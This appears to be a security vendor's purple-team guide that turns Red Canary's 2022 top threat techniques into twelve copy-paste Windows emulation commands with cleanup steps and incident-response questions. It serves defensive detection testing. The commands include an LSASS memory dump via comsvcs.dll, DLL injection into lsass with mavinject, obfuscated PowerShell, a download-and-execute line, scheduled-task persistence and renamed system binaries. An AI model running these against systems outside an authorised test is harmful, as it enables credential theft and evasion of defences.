Operationalizing Red Canary's 2022 Threat Detection Report

Executive Summary

How do we get started with Purple Team? This is a question we hear far too often and this is one of the best ways to get started. Red Canary released the 2022 Threat Detection Report Top Techniques in March 2022 and it includes the top techniques they observed over the past year. The purpose of this report and emulation is to baseline visibility into common adversarial techniques. “For leaders, the most prevalent techniques can help you identify gaps as you develop a road map for improving coverage. You can assess your existing sources of collection against the ones listed in this report to inform your investments in new tools and personnel.” - Red Canary

Cyber Threat Intelligence

Red Canary is a legitimate company and not a threat actor. However, they release actionable Cyber Threat Intelligence and hence why we have added it to our community threats. As mentioned above in the executive summary, emulating top techniques can help identify and prioritize gaps. From a practitioner standpoint, the data generated allows research and practice with common telemetry needed to conduct detection engineering.

Attack

If you are a SCYTHE customer, you can automate this attack chain quite easily. If you are not a SCYTHE customer, we provide the manual emulation steps so you can test on your own system.

Automated Emulation

This threat chains together the top techniques from the Red Canary 2022 Threat Detection Report.

  1. Download and import the threats in JSON format to your SCYTHE instance
  2. Download the Virtual File System (VFS) files under VFS
  3. Upload the VFS files to your SCYTHE VFS in the following location: VFS:/shared/threats/RedCanary
  4. Create a new campaign RedCanary2022TDR with HTTPS
  5. Import from Existing Threat: RedCanary2022TDR
  6. Launch the Campaign


Manual Emulation

You can manually execute each technique provided in the Red Canary 2022 Threat Detection Report on a target host by copying and pasting these procedures:

1. powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==

  • Execute this from a non-privileged cmd.exe

2. %LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: del hello.txt

3. rundll32.exe pcwutl.dll,LaunchApplication C:\Windows\System32\notepad.exe

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: wmic process where name="notepad.exe" delete

4. wmic /node:"127.0.0.1" process call create “calc.exe”

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: wmic process where name="calc.exe" delete
  • Note the version of Windows may call the process Calculator.exe or CalculatorApp.exe

5. rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\Windows\Temp\lsass.dmp full

  • Execute this from a privileged cmd.exe
  • Clean up by executing: del C:\Windows\Temp\lsass.dmp

6. (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt

  • Execute this from a non-privileged powershell.exe
  • Clean up by executing: wmic process where name="notepad.exe" delete
  • Clean up by executing: del LICENSE.txt

7. mavinject.exe ((Get-Process lsass).Id) /INJECTRUNNING C:\Windows\System32\vbscript.dll

  • Execute this from a privileged powershell.exe
  • Clean up by rebooting

8. schtasks /Create /F /SC MINUTE /MO 3 /ST 07:00 /TN CMDTestTask /TR ""cmd /c date /T > C:\Windows\Temp\current_date.txt"

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: schtasks /Delete /TN CMDTestTask /F

9. $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

  • Execute this from a non-privileged powershell.exe

10. copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\notepad.exe & C:\Windows\Temp\notepad.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: del C:\Windows\Temp\notepad.exe

11. Set-ExecutionPolicy Bypass -Scope Process -Force ; .\tweet.ps1

  • Download tweet.ps1 to the working directory
  • Execute this from a non-privileged powershell.exe
  • Clean up by executing: del $Env:windir\Temp\svchost.exe

12. copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe & copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll & %APPDATA%\updater.exe -Command exit

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: del %APPDATA%\updater.exe & del %APPDATA%\amsi.dll

Detection Opportunities

The following are detection opportunities for the specific procedure conducted in emulating the technique. It’s worth noting that this should not be used for full coverage of all procedures that may be conducted under the umbrella of the technique.

Respond

If any of the alerts are detected in the environment, the response team should determine the depth of the Kill Chain, collect artifacts, and answer the following questions:

  • Was the installation successful?
  • What are the persistent mechanisms?
  • Is Command & Control (C2) successful?
  • What are the domain names, IP addresses, ports, and protocols used?
  • Are there observations of Actions on Objectives (AOO)?
  • What are they?
  • Did the actor laterally move?
  • Was sensitive data taken?
  • Usernames, Passwords, Other?
  • What caused the initial compromise?
  • How was it delivered?
  • What was exploited?
  • Vulnerability, Control, Human?

Once it has been determined how deep the intrusion goes, containment, eradication, and recovery should begin.  After recovery, lessons learned should drive additional courses of action (COAs) to thwart the threat should it return, such as implementing additional security controls. As always, please follow your organization's response plan and evidence retention policies. We also recommend leveraging NIST SP 800-61 Rev. 2.

Authors

Christopher Peacock is an Adversary Emulation - Detection Engineer at SCYTHE, specializing in Purple Team Exercises and Detection Engineering. His previous experience includes multiple roles such as Cyber Threat Intelligence Analyst, Cyber Threat Hunter, Tier 3 SOC Analyst, Incident Responder, Cyber Security Consultant, and Purple Team Lead. He previously worked at Raytheon Intelligence & Space and General Dynamics Ordnance & Tactical Systems. Additionally, he has experience in multiple industries, including Energy, Finance, Healthcare, Technology, and Defense. Current certifications include GCTI, GCFA, GCED, eJPT, and CSIS.

Jorge Orchilles is the Chief Technology Officer of SCYTHE and co-creator of the C2 Matrix project and author of the Purple Team Exercise Framework. He is a SANS Certified Instructor and the author of Security 564: Red Team Exercises and Adversary Emulation. He was a founding member of MITRE Engenuity Center of Threat-Informed Defense. He is a Fellow at the Information Systems Security Association (ISSA) and National Security Institute. Prior, Jorge led the offensive security team at Citi for over 10 years.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors.

References

  1. https://redcanary.com/threat-detection-report/techniques/
  2. https://redcanary.com/threat-detection-report/techniques/powershell/
  3. https://redcanary.com/threat-detection-report/techniques/windows-command-shell/
  4. https://redcanary.com/threat-detection-report/techniques/rundll32/
  5. https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/
  6. https://redcanary.com/threat-detection-report/techniques/lsass-memory/
  7. https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
  8. https://redcanary.com/threat-detection-report/techniques/process-injection/
  9. https://redcanary.com/threat-detection-report/techniques/scheduled-task/
  10. https://redcanary.com/threat-detection-report/techniques/obfuscated-files-information/
  11. https://redcanary.com/threat-detection-report/techniques/rename-system-utilities/
  12. https://redcanary.com/threat-detection-report/techniques/match-legitimate-name-or-location/
  13. https://redcanary.com/threat-detection-report/techniques/dll-search-order-hijacking/
  14. https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf